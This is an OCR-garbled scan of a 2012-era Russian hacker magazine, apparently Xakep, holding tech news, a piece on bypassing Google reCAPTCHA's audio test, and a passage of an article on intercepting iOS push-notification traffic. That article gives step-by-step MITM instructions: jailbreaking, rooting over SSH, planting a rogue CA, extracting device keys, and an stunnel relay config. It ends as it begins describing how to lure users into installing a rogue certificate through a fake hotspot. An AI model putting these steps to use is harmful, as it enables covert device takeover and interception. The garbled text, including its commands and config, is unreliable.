начали высказываться о будущем сервиса с большим скепсисом, мол, 
«мелкомягкие»навернякаугробят5куре. Прошел год, и можно сказать, 
что некоторые из этих мрачных прогнозов все же начинают сбываться: 
стало известно, что софтверный гигантпринялся кардинально менять 
всю инфраструктуру сервиса. Напомним, что ранее 5ку ре работал как 
Р2Р-сеть: существовала сеть из клиентских машин, которая основы- 
валасьнасупернодах, ате, всвоюочередь, работали на основе самих 
клиентских компьютеров, подключенных к сервису. Эти компьютеры 
должны былиудовлетворятьтребованиям пропускной способности, 
вычислительной мощности и другим характеристикам. В среднем в 
режимесупернода работало приблизительно48тысяч клиентских 
компьютеров, и каждыйузел обслуживал в среднем 800 клиентов сети. 
Но корпорация МісгозоЙсочлатакую структуру небезопасной и не 
отвечающей требованиям устойчивости. Согласно исследованию экс- 
перта компании ІтппипіІуЗесигіІу Константина Корчинского, МіегозоЙ 
отказаласьотэтого дизайна в пользу развертывания собственной сети 
на базе десяти тысяч серверов на основе защищенной версии Ыпих, с 
установленными патчами безопасности отпроекта бРЗесигіІу. Дело 
в том, что количество супернодов недавно сократил ось до десяти 
с небольшим тысяч, и все они переместились на хостинг МіегозоЙ. 
Каждый выделенный сервер сейчас поддерживает по 41 00 подклю- 
чений (итого41 миллион одновременноработающихпользователей) 
и имееттеоретический предел в стотысяч подключений. Пословам 
Корчинского, изменения начались две-три недели назад и они являются 
самой кардинальной сменой инфраструктуры Зкуреза всю историю 
сервиса. Разумеется, у многих уже возникло подозрение, что на этот 
шаг компания пошла еще и для упрощения возможности перехвата 
голосовоготрафика между пользователями, ведьпри старой системе 
организация контроляза активностью пользователей была бы излишне 
усложненной и заметной. Впрочем, стоит сказать, что раньше из-за 
Р2Р-инфраструктуры у сервиса действительно случались проблемы, 
вплотьдо глобальныхперебоев в работе, а количество пользователей 
5куре все растет, то есть на грузки только увеличиваются. 

Ну и раз речь зашла о 5куре, отметим, что пару недель назад в 5куре 
5.5была выявлена особенность, позволяющая легкоопределитьпо- 
следний активный ІР-адрес любого пользователя, не делая вызова и не 
добавляя этого пользователя в списокконтактов. Подробную инструк- 
цию, какэтосделать,запостили на РазІеЫп [ раз1еЬіп.сопп/гВи4]Рпп8] . 

Но интересен даже не сам этот факт, а то, что МіегозоЙ не признает это 
уязвимостью иуверяет, что подобная проблема свойственна и другим 
Р2Р-приложениям. Впрочем, МіегозоЙ всеже обещала подумать, как 
защититьсвоихпользователей отданной не-уязвимости. На момент 
написания этой новости компания по-прежнему «думает». 



РОХСОЫЫ ГОТОВЯТСЯ К ПРОИЗВОДСТВУ ТЕЛ ЕВИЗОРААРРІЕ 



ГЛАВА РОХСОММ 
ТЕРРИ ГОУ ПОДТВЕРДИЛ, 
ЧТО ЗАВОД ГОТОВИТСЯ 
К ПРОИЗВОДСТВУ 
ІРАМЕСПТѴІ 



ЗАБОТЛИВЫЙ 



ОФИС 




коворкинг 

в современном 
бизнес-центре 

за 1 0 тыс. рублей в месяц 



• 3 минуты пешком от метро «Автозаводская» 

• полностью оборудованное рабочее место 

• доступ в интернет 

• печать документов 

• пользование общими зонами (кафетерий, 
переговорные, мягкие зоны) 

• другие услуги по запросу 



Офис Менеджмент 
+7 499 6382119 



С НАМИ УЖЕ РАБОТАЮТ 

[Ж! (датеііаай іИ 
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БОЛЕЕ 2000 ЗАЯВОК на новые домены верхнегоуровня уже получила ІСАММ, среди них«.ДЕТИ», МОСКВА». 



«ИНТЕРНЕТ-ОСКАРЫ» 

ВРУЧЕНЫ 

ОБЪЯВЛЕНЫ ЛАУРЕАТЫ >ѴЕВВУАѴѴАЯ05 
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ТНЕ УЕА[? ОІЗТІІІЕР 
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Премия ѴУеЬЬу 
Аѵѵагсіз существует 
16лет. Более Юты- 
сячработизбОстран 
мирабыли номини- 
рованы на награду 
в 201 2 году. 



ремиюѴѴеЬЬуАѵѵагсІз часто называют«интернет-Оскаром», 
и этозвание вполнезаслужено. ѴѴеЬЬуежегодно присужда- 
ется лучшим веб-проектам мира — сайтам в сотне тема- 
тических категорий, интернет-рекламе, сетевым видеороликам, 
сервисам и сайтам для мобильных телефонов и даже мобильным 
приложениям. Перечислим наиболеезаметных призеров этого года. 
5куре получил награды за лучшее социальное мобильное приложе- 
ние и лучшее использование камеры на смартфоне/планшете (по 
результатам голосования). Поверсиижюри, призвданной категории 
отошел программе 5ирег 8 — оригинальному интерфейсу для съемки 
видеофильмов на смартфоне со спецэффектами. 

Российский Еѵегпоіе признали лучшей утилитой и сервисом для 
мобильных устройств. ОгорЬох получил сразу четыре награды: две по 
версии жюри и две по результатам голосования в номинациях «Пере- 
довой веб-сайт» и «Лучший веб-сервис». В категории «Социальные 
медиа» награду разделили РіпІегезНжюри) и 6оод1е+ (голосование); 
в категории«Музыка» — РіІсЫ'огки Рапбога. 

СпециальныхпризовѴѴеЬЬуАѵѵагбз 20 12 удостоились проекты, 
которые в последнее время находятся на слуху: Іпзіадгатзавоевал 
титул «Прорыв года», а РасеЬоок был удостоен награды за самый 
большой вкладвизменения вобществе. 




ГОРОД БЕЗЛЮДЕЙ 

УЧЕНЫЕ В США МАСШТАБНО ЭКСПЕРИМЕНТИРУЮТ 




Прототипом для 
города-полигона 
выступит реальное 
поселение — Рок 
Хилл (Южная Каро- 
лина). Строитель- 
ство сотни домов, 
пригородной терри- 
тории и фермерских 
полей начнется 
вближайшеевремя. 
Проектпланируют 
завершить за десять 
лет. 



ногие из наших читателей наверняка видели фильм 
«Индиана Джонс и Королевство хрустального черепа» 
и помнятэпизод, в котором отважный археологв исполнении 
Харрисона Форда очутился в безлюдном городе, который на поверку 
оказался л ишь макетом для ядерных испытаний. Однако макет был 
выполнен весьма педантично — настоящиедома, дороги, инфра- 
структура, даже манекены вместолюдей. Думаешь, всеэто вымысел 
киношников и на самом деле подобных объектов не существует? 

Еще как существуют! Недавно был обнародован план строительства 
подобного города безлюдей, который собирается воплотить вжизнь 
американская компания Редазиз бІоЬаІ Ноібіпдзсилами дочернего 
предприятия СІТЕ, созданного для этого эксперимента. Город должен 
получиться не хуже, чем в кино, к тому же специальные программы 
будут эмулировать поведение жителей: включать и выключать свет, 
открыватьизакрывать краны вванныхи на кухняхитакдалее.Этот 
проектобойдется компании в миллиарддолларов; город-призрак 
собираются строитьв штате Нью-Мексико. Нужен этотнедешевый 
макет, какнетруднодогадаться, длятестирования новыхтехнологий, 
которые невозможно проверитьв настоящих городахна реальных 
людях: интеллектуальные системы контроля дорожного движения, 
умныеэлектросети, энергосберегающиетехнологии, беспроводные 
сети следующего поколения. Боб Брамли, старший исполнительный 
директор компании Редазиз бІоЬаІ Ноібіпдз, уже назвал проект горо- 
да безлюдей «настоящим луна-парком дляученых». 





В ЦЕЛЯХ БЕЗОПАСНОСТИ 

разработчики Ріге!охиСИготе 
решилиубрать отображение 
фавиконов в адресной строке 
браузера. Оказывается, уже 
дажефавиконы научились 
использовать для фишинга, 
например, ихподменяютна 
значокБЗІ-соединения.Такой 
простойхакотлично вводит 
пользователей в заблуж- 
дение. Втабахизакладках 
значки, конечно, по-прежнему 
останутся. 




СОСТОЯЛСЯ РЕЛИЗ СЕТЕ- 
ВОГОСКАНЕРАНМАР6 
( ММАР.0К6/6 І, после трех 
лет работы и 3924 коммитов 
кода. Количествоскриптов 
увеличилось до 348, улучшен 
2ептар6Ш. 




ПАМЯТЬ00Я4УЖЕНЕЗА 
ГОРАМИ. ВследзаЗатзипд 
и Нупіхкомпания Місгоп 
ТесИпоІоду объявила о созда- 
нии своего первого «пол не- 
функционального» модуля. 
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ОПУБЛИКОВАН ТРАДИЦИОННЫЙ КВАРТАЛЬНЫЙ ОТЧЕТ АРР1Е:за прошедший финансовый год прибыль компании выросла почти вдвое. 



КИБЕРПАНК И ФУТУРИЗМ ОТ МІСР050РТ 

О ПОСЛЕДНИХ РАЗРАБОТКАХ СОФТВЕРНОГО ГИГАНТА 



МІСГОЗОІІ 


ч 


т 


Ш НГ’ 


л. ш 


\ 

г 

г 

1 



Недавно глава Арріе 

ТимКукпошутил, 

чтоѴѴіпсІоѵѵзв 

смахиваетна 

помесьтостера 

схолодильником. 

Врядли эта шутка 

оказаласьобидной 

для МісгозоН, где 

сейчасдействи- 

тельно идет работа 

надОСдлятостеров 

ихолодильников. 



ока весьпрогрессивный мир ожидает выхода ѴѴіпсІоѵѵз 8 
и тестирует бету, в МісгозоЙ кипитработа наддругими 
проектами. Стало известно, что компания уже прово- 
диттестирование НоітіеОЗ — платформы, предназначенной для 
управления «умным домом», то есть практически всей электро- 
никой и бытовойтехникой, находящейся внутри дома, включая 
компьютеры, смартфоны и планшеты. Дело втом, что в МісгозоЙ 
уверены: в будущем автоматизированы будут все бытовые приборы 
иустройства, отмикроволновки до жалюзи на окнах. Оказывается, 
тестирование НоітіеОЗ длится уже 4-8 месяцев и в нем принимают 
участие 12 жилищ. Кроме того, в процессе участвуют больше пяти- 
десяти студентов, которые разрабатываютприложения и сервисы. 
Операционная система описывается как«ядро, которое позволяет 
легко подключать к себе устройства любого типа». Также стал о 
известно, что система базируется на С# и .Меі Ргатеѵѵогк4.0 и рас- 
считана назапускна выделенном домашнем компьютере. Важное 
условие: бытовыеустройства не нужно модифицироватьдлятого, 
чтобы они могли работатьсОС. Вместес«домашней»операционкой 
развивается и проект НотеВіоге, главная идея которого состоит 
в облегчении поиска новыхприложений, драйверов и устройств 
для подключения кНоітіеОВ. Впрочем, несмотря на развернутое 
тестирование, М іеговой пока скромно молчит о планах относительно 
коммерциализации новой ОС. 

Но это, конечно, далеко не все, чем заняты сотрудники М іеговой. 
Похоже, корпорации также очень понравилось создавать штуки типа 
Кіпесй Стало известно, что лаборатория МіеговоЙ РевеагсЬ совмест- 
но с Университетом штата Вашингтон создали систему управления 





компьютером при помощижестов — БоипсІѴѴаѵе. Отличительная 
черта разработкизаключается втом, чтодля фиксации движений 
используются только микрофон и динамики. Говоря проще, в основу 
системы ВоипсІѴѴаѵе положен эффектДоплера. Звук излучается ди- 
намиками на частоте 18-22 кГц, затем звуковой сигнал отражается 
от руки пользователя и фиксируется микрофоном, далее при помощи 
математическихфункций рассчитываются координаты располо- 
жения руки или самого пользователя. Полученные координаты соот- 
носятся с предыдущим значением. Если изменение попадает под 
какое-либо условие, программное обеспечение выполняет ту или 
иную АРІ -функцию. На данный момент программное обеспечение 
ЗоипсІѴѴаѵе способно определять приближение и удаление объекта, 
движение влево/вправо и вверх/вниз, а также справляется с рядом 
более сложных комбинаций этих движений. Предвидя опреде- 
ленный скептицизм, разработчики уверяют: система работает 
с точностью 90-100% и шум вокруг на это не повлияет (даже громкая 
музыка). Пока неясно, когда разработчики доведуттехнологию до 
готового состояния, но внедрение ЗоипсІѴѴаѵе могло бы оказаться не 
лишним в навигации по интерфейсу Мейо новой ОС ѴѴіпсІоѵѵ5 8,тем 
более чтодля ее работы понадобится только штатное оборудование 
компьютера. 



АЖИОТАЖНЫЙ СПРОС НА 
АКЦИИ СОЦСЕТИ ПРИВЕЛ К 
СБОЮ В СИСТЕМЕ НА50А0, 

ИЗ-ЗА КОТОРОГО ТОРГИ 
АКЦИЯМИ РАСЕВООК НАЧАЛИСЬ 
ПРИМЕРНО НА 30 МИНУТ ПОЗЖЕ 
ЗАПЛАНИРОВАННОГО СРОКА 
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КОЛОНКА 
СТЁПЫ ИЛЬИНА 

кодинг 

в СТИЛЕ 
ЕЕ60 



60061ЕВ10СКІУ 

Накануне сдачи номера увлеклись в редакции 
простой, но занятной задачкой. На сайте ЬіСІѵ/ 
КРИ7Ю отображается лабиринт и человечек, 
которого нужно провести до выхода. Однако 
для описания логики предлагается использо- 
вать ВІоскІу — новый визуальный язык про- 
граммирования от Ооодіе. По сути, это старая 
идея сделать кодинг (именно тупой кодинг, а не 
разработку в полном смысле слова) доступ- 
ным нетехническим людям. ВІоскІу позволяет 
создавать приложения, собирая вместе не- 
большие графические объекты — почти как 
конструктор 1Е60. Каждый визуальный объект 
означает один из необходимых элементов 
программирования: переменную, счетчик, 
«И'-іЬеп»-условие — комбинируя их, можно 
реализовать простейшие функции. К примеру, 
алгоритм для выхода из лабиринта — мы тут, 
правда, немного считерили и для большей 
универсальности алгоритма изучили статью 
«Как пройти через лабиринт не заблудившись» 
из журнала ЗсіпІіЛс Атегісап от 1986 года :). 

Надо сказать, что у Соодіе'а уже был ана- 
логичный проект — ЗсгакЬ. Впоследствии он 
стал распространяться в открытых исходниках 
и перекочевал под опеку Массачусетского 
технологического университета [ бсгаІсЬ.ітііЕ 
еби ). Даже внешне проекты очень похожи — 
есть ли разница? Одной из немногих фишек 
ВІоскІу стала возможность конвертировать 
схему программы во вполне человеческий код 
на РуіЬоп, ^аѵа5сгір^ и культивируемый в Гугле 



V V V у у V V V V у у у у у V у V > У у у у у -у V V у г V у 



ВккЫу > > Маіе 



: 'иАІігиіііиЛІп 



СогШЫ 



Шп ІИІІ1-Й ІІгДйМ ИЙІІ 



« 9 л. 



г 







Одно из решений задачки про лабиринте помощью ВІоскІу 



язык ОагЕ Правда, обратной конвертации не 
предусмотрено. Оно и понятно: попробуй, к 
примеру, реализовать перезагрузку операто- 
ров в графическом виде :). По этой же причине 
очевидно, что об использовании ВІоскІу для 
мало-мальски серьезной разработки не может 
быть и речи, — это скорее инструмент для обу- 
чения. Впрочем, кое-что с помощью визуаль- 
ного программирования создать можно :). 

АРРІМѴЕМТ(РР 

Идея ЗсгаІсЬ, что приятно, получила дальней- 
шее развитие. К примеру, появился проект Арр 
Іпѵепіог ( арріпѵепІогесІи.ппіЕесІи ]. позволяю- 
щий, используя визуальный подход, не только 
описывать какую-то абстрактную логику, но 
и создавать вполне конкретные приложения 
на АпбгоісІ. Интерфейс программы создается с 
помощью ѴѴУЗІѴѴУб-редактора — достаточно 
разместить в нужных местах элементы буду- 
щего интерфейса. А логика выполнения за- 
дается с помощью визуального конструктора, 
похожего на ЗегакЬ. При этом в самом простом 
случае вообще ничего не надо устанавли- 
вать — среда разработки реализована в виде 
веб-сервиса и работает прямо через браузер. 
Правда, для подключения к реальному устрой- 
ству придется использовать специальный 
^аѵа-апплет. В результате, посмотрев несколь- 
ко видеороликов, каждый может создавать 
несложные приложения для быстро растущей 
мобильной платформы, которые можно рас- 
пространять через боодіе РІау. 



Не менее впечатляет другой проект, вырос- 
ший из ЗсгакЬ'а, — зіепсуі ( ѵѵѵѵѵѵ.зіепсѵі.сопп ]. 
Это очень добротная, проработанная до мелочей 
среда для создания 20-игр, которые легко 
экспортируются в приложения для Ю5 (то есть 
іРЬопе и іРаб), а также РІазЬ (для игры через 
браузер). Список платформ скоро расширится: 
уже почти реализован экспорт разработанных 
игр для платформы АпбгоісІ и НТМ15. Фреймворк 
представляет собой большое количество заго- 
товок, из которых последовательно собирается 
готовая игрушка. При этом механика игры опять 
же программируется с использованием визуаль- 
ного подхода. Если зайти в раздел с примерами 
приложений, то ответ на вопрос «Кому вообще 
нужно это визуальное программирование?» уже 
не кажется таким очевидным :). 




Программирование механики игры в визуальном 
редакторе ЗІепсуІ 
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" РгооІ-оі'-СопсерІ: 

Щ РАСПОЗНАТЬ С0061Е КЕСАРТСНА 

^ С точностью 99,1% 



О ЧЕМ РЕЧЬ? 

Едва ли найдется хоть один пользователь, который хотя бы раз 
в жизни не проходил антибот-проверку на основе САРТСНА. 
Ввести сложно различимые буквы и цифры, решить уравнение, 
разгадать загадку — проверки на «человечность» сейчас самые 
разнообразные. Разработка хорошей капчи, которая легко реша- 
лась бы человеком, но была бы препятствием для автоматиче- 
ских распознавалок — целая наука. Поэтому многие проекты 
предпочитают пользоваться услугами специальных сервисов, 
предоставляющих надежные САРТСНА через систему просто- 
го АРІ. Лидером среди таких проектов, безусловно, является 
геСАРТСНА [ гесарІсЬа.пеП . 

В отличие от других похожих сервисов, которые генерируют 
картинку из рандомного набора символов и цифр, накладывая 
на них затрудняющие распознавание фильтры, геСАРТСНА берет 
изображения для распознавания из реальной жизни. Изна- 
чально пользователю предлагалось изображение двух слов из 
отсканированной версии бумажной книги или журнала. Идея в 
том, что одно из этих слов не было распознано ОСР-системой во 
время оцифровки, а значит, является проблемой для автомати- 
ческих распознавалок. Система проверяет пользователя лишь 
по одному из слов, а ответ по второму использует для распозна- 
вания изображения. Идея гениальная: это и надежная капча, 
и система для оцифровки книг, в которой участвуют миллионы 
пользователей (кстати, проект в 2009 году был куплен Соодіе). 

С недавнего времени среди картинокдля распознавания 
появились также таблички с номерами домов из Соодіе Зігееіз 
Ѵіеѵѵ. Эффективность такого подхода не вызывает сомнений: 
разработать автоматическую распознавалку с высокой точно- 
стью еще никому не удавалось. Ровно до того момента, пока на 




Маркеры в начале блоков позволяют четко идентифицировать отдельные слова 



конференции Іауег Опе хакеры из группы ОС949 ( с1с949.ога ) не 
представили утилиту Зіікѵѵаікег, которая способна проходить 
тесты Соодіе геСАРТСНА с результатом 99,1%. То есть делать это 
лучше человека :). 

В ЧЕМ ИДЕяТ 

Парни не стали решать проблему в лоб, а посмотрели на нее с 
другой стороны. Дело в том, что помимо графического теста, 
геСАРТСНА поддерживает еще звуковой тест, предназначен- 
ный прежде всего для людей с плохим зрением. Идея вот в 
чем: юзеру с небольшим интервалом проигрывается шесть 
слов, которые необходимо распознать на слух. Чтобы исклю- 
чить возможность использования систем автоматического 
распознавания речи, на транслируемый поток аудиоданных 
накладывается фильтр, представляющий собой поток высоко- 
частотного статического шума, который проигрывается в об- 
ратном порядке. Что сделали ОС949? Они нашли уязвимость и 
сумели обнаружить явные маркеры начала каждого из шести 
слов (см. спектрограмму ниже). Таким образом, по распознан- 
ным маркерам появилась возможность идентифицировать 
отдельные слова. 

Выяснилось, что словарь звукового теста геСАРТСНА состоит 
всего из 58 уникальных слов. Для генерации перцептуального 
хеша звуков разработчики использовали Ореп Зоигсе библиоте- 
ку НазЬ ( ѵѵѵѵѵѵ.рИазЬ.огд ] — такой хеш практически не меняется 
при обработке похожих звуков. Сравнивая хеши, можно делать 
обоснованные догадки о том, какие конкретно из 58 слов ис- 
пользуются в каждом наборе. Данная техника сама по себе 
показывала неплохую эффективность распознавания — около 
30%. Но ее удалось увеличить благодаря применению алгорит- 
мов машинного обучения. Простая нейронная сеть, прошедшая 
обучение на 50 тысячах тестов геСАРТСНА и использующая 
криптографические хеши М05, показывает феноменальный 
результат — 99,1% -я вероятность распознавания. 

А НА ПРАКТИКЕ? 

Авторы опубликовали программу вместе с исходниками и всеми 
необходимыми инструментами (под Ыпих). Слайды презентации 
Зіікѵѵаікег с хакерской конференции Іауег доступны онлайн 
( ЬіМѵ/МАЭ4Эа ). Показанный результат 99,1% является рекордным 
для всех систем взлома геСАРТСНА, которые публиковались 
ранее. За два часа до публикации системы ЗііІІѵѵаІкег компания 
Соодіе усовершенствовала генерацию фонового шума, так что 
спектрограмма геСАРТСНА на высоких частотах видоизмени- 
лась. Звуковой тесттеперь сопровождается шумом из челове- 
ческих голосов, содержит десять слов вместо шести и длится 
тридцать секунд вместо восьми, так что ЗііІІѵѵаІкег перестал 
работать. 
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С0ѴЕІ15Т0КУ 




ВКУС 

ЧУЖИХ 

ЯБЛОК 



РАСКРЫТИЕ 551 
И ПЕРЕХВАТ 
ЭЛЕМЕНТОВ 
УПРАВЛЕНИЯ 
УСТРОЙСТВАМИ 
НА БАЗЕ 105 
В \У1-Р1-СЕТЯХ 



Мало кто из владельцев іРИопе или іРасІ задумывается 
о том, что их любимый девайс постоянно держит связь 
с серверами Арріе. Это необходимо, чтобы реализовать 
некоторые интересные фичи, например возможность 
удаленно удалить все данные с безвозвратно 
потерянного девайса. Но вот вопрос: так ли защищен 
этот механизм и не может ли заюзать его кто-то другой 
для доступа к твоему смартфону? 
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і^отЬіе, или вкус чужих яблок 



ВВЕДЕНИЕ 



Итак, речь пойдет о мобильных устройствах іРЬопе/іРасІ. Не секрет, 
что в яблочных устройствах есть механизм, негласно отстукиваю- 
щий в Арріе о своих владельцах. При этом «продается» он как уни- 
кальная возможность удаленно управлять своими устройствами — 
например, для определения его расположения на случай, если 
телефон был потерян или украден. Но то ли из-за лени, то ли из-за 
угрозы черных вертолетов интернет не богат исчерпывающими 
описаниями этих механизмов. Интерес к тому, что уходит в Арріе, 
подогревается тем, что связь с серверами Арріе наглухо зашиф- 
рована, причем контроль подлинности обеспечивается не только 
сервера, но и местами клиента. Да-да, для каждого устройства 
заводится свой удостоверенный Арріе'ом сертификат! И на первый 
взгляд даже кажется, что защита этого механизма более чем 
надежна. Однако я все-таки решил провести небольшое исследо- 
вание и разобраться в простом вопросе, можетли злоумышленник 
обойти криптографическую защиту и перехватить контроль над 
чужим устройством. Забегая вперед, скажу одно: может! 






что ТАКОЕ РУЗН? 



Для начала давай разберемся, о какой это технологии для уда- 
ленного управления сразу всеми устройствами на базе І05 идет 
речь. Называется она Арріе'з РизЬ МоІіЛсаІіоп Зегѵісе (АРМа), 
но дальше я часто буду называть ее просто РизЬ. Технически 
это завернутый в 551 легкий (максимальный размер рауіоаб — 
256 байт) бинарный протокол, предназначенный для передачи 
сигналов на устройство серверов Арріе в режиме реального 
времени. Любое устройство на І05 в момент первого запуска вы- 
полняет процедуру активации — это необходимо, чтобы только 
что вытащенный из коробки свежий іРЬопе или іРасІ начал 
полноценно работать. В процессе активации происходит гене- 
рация пары ключей, публичная часть которой удостоверяется 
корневым сертификатом (СА) Арріе и сохраняется на устройстве 
(кстати, это одна из причин, почему для активации нужен ин- 
тернет). Далее І05 каждый раз, когда обнаруживает, что сервер 
Арріе доступен, пытается установить 551-соединение на 5223-м 
порту. При этом происходит двухсторонняя аутентификация: 

І05 аутентифицирует сервер, используя имеющиеся у нее СА, а 
сервер аутентифицирует клиента по сертификату, полученному 
при активации устройства. 

В публичной документации Арріе подробно описано, как раз- 
работчики могут использовать АРМз для связи со своими прило- 
жениями. Но, что странно, нет никаких описаний взаимодействия 
между АРМз и Ю5. Расскажем об этом подробнее. После успешной 
установки 551-соединения клиент отправляет серверу описание 
устройства в бинарном виде, по которому сервер проверяет, со- 
ответствует ли сертификат тому устройству, которое его пытается 
использовать. Если сертификат одного устройства применить на 
другом девайсе, то соединение моментально разорвется. Если 
проверка проходит успешно, то І05 получает от Арріе своего рода 
АСК-сообщение (Об 00 00 00 00 — его хорошо видно на скриншоте) 
и... начинаетждать команды. 

Что можно посылать через АРМз? Например, стандартные из- 
вещения для мобильных приложений, хорошо знакомые любому 
пользователю І05. Или коротенькое текстовое сообщение, которое 
выведется на экран устройства. А можно передать следующее осо- 
бенное сообщение: 

{ 

"зегѵегСопІіехІ:" : { 

'ЧарЗепбТЗ": "2012-05-08118:55: 36. 6682", 
"1:ар$епс1Соп1:ех1:" : "-Ршір" 

} 

} 



Получив его, устройство, никак не уведомляя пользователя, 
начинает общение с одним из механизмов Арріе іСІоиб — Ріпб ту 



Схема аутентификации АРМ5 и І05-устройства 



іРЬопе (отсюда и сокращение ^тір, использующееся в сообще- 
нии). Это, напомню, сервис для определения текущего местора- 
сположения телефона. 

Ты спросишь: «Как удалось вклиниться в защищенный канал 
при условии двухсторонней аутентификации и подсмотреть эти 
нюансы?» Используемый подход, в общем-то, известен. Для того 
чтобы провести МІТМ-атаку, на шлюзе размещается удостове- 
ренный Арріе'ом сертификат и ключ устройства, а на устрой- 
стве — самозваный СА, которым впоследствии будет удостове- 
рен фальшивый сертификат с атакующего шлюза. Когда есть 
доступ к іРЬопе'у, провернуть это не бог весть какая задача: 

1. Сначала делается джей л брей к устройства. 

2. Далее осуществляется вход по 55Н под гооСом. 

3. На устройстве устанавливается самозваный СА. 

4. В директории ргіѵаІе/ѵаг/КеусЬаіпз запускается предваритель- 
но скачанная утилита пітЫе. 

5. Полученные в результате ее работы файлы — ризЬ-Ып.сгІ и 
ризЬ-Ып.кеу — перетаскиваются на атакующий шлюз (с пред- 
варительной конвертацией их из ОЕР в РЕМ). 

6. На шлюзе поднимается утилита зШппеІ со следующим конфигом: 
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Получив это АСК-сообщение (ОсІ 00 00 00 00), І05 начинает ждать команды 
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(жиіпе РгоПІе 

Не ніДіжннй 



^Уст^иоенть^ 



СоДіВ-ріиніт С«рТ>іфикІТ 




Бол«в подробно 
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[арр1е_ті1;т_ри5Іі_5] 

ассері: = 0.0.0.0:5222 

соппесі: = 127.0.0.1:9500 

сег1і = _/Ьшіе/аііаскег/СА/соигіег . ризі і.арріе.сот.рет 

# фальшивый сертифи кат ризіі-серве ра . подписанный 

# установленным на устройство СА 

кеу = /Ііоте/а1:1:аскег/ СА/соигіег . ризіі . арріе . сот . кеу 



[арр1е_ті1:т_с] 

СѲГІ: = /Ііопіе/а1:1:аскег/СА /ри5Іі- се г1: . реш 

кеу = /Ііопіе/а1:1:аскег/С А/ри5Іі-кеѵ. реш 

# да нные с устройства^ котор ыми мы представл яемся 

# Ар ріе 

сііепі: = уе5 

ассері: = 0.0.0.0:9500 

соппесі: = 17.149.36.129:5223 

# один из Ризіі- серверов Аррі е 

Теперь, используя рогЫ'огѵѵагсІіпд на шлюзе (через ірІаЫез или 
другой файрвол), заворачиваем весь трафик к 5223-му порту на 
локальный порт 5222. 

Если все было проделано верно, то на локальном интерфейсе 
шлюза становится возможным посмотреть протокол РизЬ в от- 
крытом виде. 

Пункт 3 представляет особый интерес и будет рассмотрен от- 
дельно, а пока немного теории. 



КАК РАБОТАЕТ АУТЕНТИФИКАЦИЯ В 105? 



Операционная система І05, которая используется в іРЬопе/іРасІ, 
была любимым ребенком с хорошей наследственностью (потомок 
ОМІХ). Однако порыв сделать систему доступной для сторонних 
разработчиков и одновременно с этим желание держать их на 
коротком поводке привели к тому, что даже для такой интимной 
задачи, как аутентификация, любые приложения используют 
заранее оговоренный механизм, встроенный в саму ОС, — демон 
Зесигііу Зегѵег (зесигііусі). Он же является менеджером паролей, 
ключей и сертификатов. Сертификаты, пароли, используемые 
в родных приложениях Арріе (например, почты и браузера), со- 
храняются в базе 50Ыіе с именем кеусЬаіп-2.сІЬ, которая легко 



находится в джейлбрейкнутых устройствах. А описание формата 
закодированных данных и исходники зесигііусі-демона можно 
найти в открытом доступе на сайтах Арріе. Для нас интересны две 
особенности демона зесигііусі: 

1. В бинарник демона из коробки зашиты С А сертификаты Арріе, 
которые аутентифицирует сервер при полностью зачищенном 
или удаленном хранилище кеусЬаіп-2.сІЬ. Причем кроме корне- 
вых сертификатов Арріе здесь можно найти правительствен- 
ные сертификаты Японии, США и некоторых других стран. 

В свете этого обстоятельства использование І05 высшими 
чиновниками становится особенно пикантно. 

2. Контроль подлинности сертификата сервера происходит 
через последовательную проверку каждым установленным 
корневым сертификатом (СА). Причем нет никакого приоритета 
среди установленных СА, так что сервер будет аутентифици- 
рован успешно, если его сертификат может быть удостоверен 
хотя бы одним СА из хранилища. Это имеет ключевое значение 
для всего, что будет рассказано далее. 

Соответственно, для того, чтобы раскрыть любой 551-трафик, 
передаваемый устройством с І05 на борту, нужно решить две 
задачи: управления трафиком и доставки на устройство свое- 
го корневого сертификата. Ниже описан способ, как решить их 
обе. 



ВНЕДРЕНИЕ СА в 105 



Есть три широко известных способа установки корневого сертифи- 
ката в хранилище І05: 

• через браузер; 

• через нативный почтовый клиент; 

• через механизм МОМ (МоЫІе Оеѵісе Мападетепі). 

Так как для успешного перехвата данных как минимум требу- 
ется доступный и простой контроль над трафиком цели, то МОМ и 
почта отпадают — остается первый вариант. Сценарий, который 
с высокой долей вероятности может привести злоумышленника к 
цели, использует: 

1. Особенности интерфейса управления настройками. 

2. Маскировку под системный интерфейс. 
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і^отЬіе, или вкус чужих яблок 




Корнсайй сйртпфикат 

При установкіа сертификата 
«*ОНипа РгсЛІа>» он будет 
добавлен а список надежных 
«^тификатов та ІРИопв, 




Напроверѵиныи профиль 



Ни удаетсн провирмтъ 
подлинность «ОТ1Ив 
Уотанойка этого г^рофипн иэмйннг 
настройки на іРіѵопа. 






«иіімгтаішз ? 1;П № 



Лрофиліі устзноплен Гдтрир 



ат.1пе РгЫІІе 

9 Нйдмгіык 



О5.«гоіэ 

С«рТмф*КЛТ 

Болѳѳ подробно > 



г 




П*йуч*ч 

Сддй-рнвнгт 




УШИ 

• Описание 
зесигііусі отАррІе: 
ЬИ.1у/К1ЬАб5: 

• Описание ВІОВРОРМАТ: 
Ы^.Iѵ/К1Ь^^I: 

• Гид по системе 
РизЬ МоІіПсаІіоп: 
ЬіЦѵ/іСсІКтсІ: 

• Описание 
ЫоІіПсаІіоп РауІоасІ: 
ЬИ.1у/еУУУх7| . 



ѵ/Аймтс 



Обрати внимание, что 
материал представлен 
исключительно в об- 
разовательных целях, 
чтобы показать изъяны в 
технологиях, которые на 
первый взгляд кажутся за- 
щищенными. Не повторяй 
на практике! Это может 
нанести вред твоему или 
чужому устройству. Редак- 
ция и автор ответствен- 
ности не несут. 



ІШ1 

При отдельном запро- 
се я могу поделиться 
небольшим сервером, 
который проделывает все 
описанное. Нотак какой 
только для лабораторных 
исследований, то все 
значения, которые могут 
меняться от устройства 
к устройству, типа исіісі и 
переменных в ІІРІ, в нем 
захардкожены под мой 
лабораторный девайс. 

Ликующим пользова- 
телям АпсІгоісІ хочется 
сказать, что у Соодіе 
также есть аналогичная 
АРМз технология, по- 
зволяющая, к примеру, 
установить или удалить 
приложение сразу на всех 
устройствах. Речь идет 
о С20М (СІоисІ Іо Оеѵісе 
Меззадіпд Ргатеѵѵогк), и 
мы подробно рассма- 
тривали его в статье 
«АпсІгоісІ-марионетки» 
( ЫЫу/пзуУУсЫ . 



□ Вот так нерадивый пользователь, в погоне за бесплат- 
ным инетом, устанавливает себе левый сертификат 



3. Непонимание -99% пользователей Ю5 основ технологии аутен- 
тификации с помощью открытых ключей. 



ЖИВОТНАЯ ЖАЖДА ИНТЕРНЕТОВ! :) 



Идея вот в чем — поднять свой хотспот с «бесплатным интерне- 
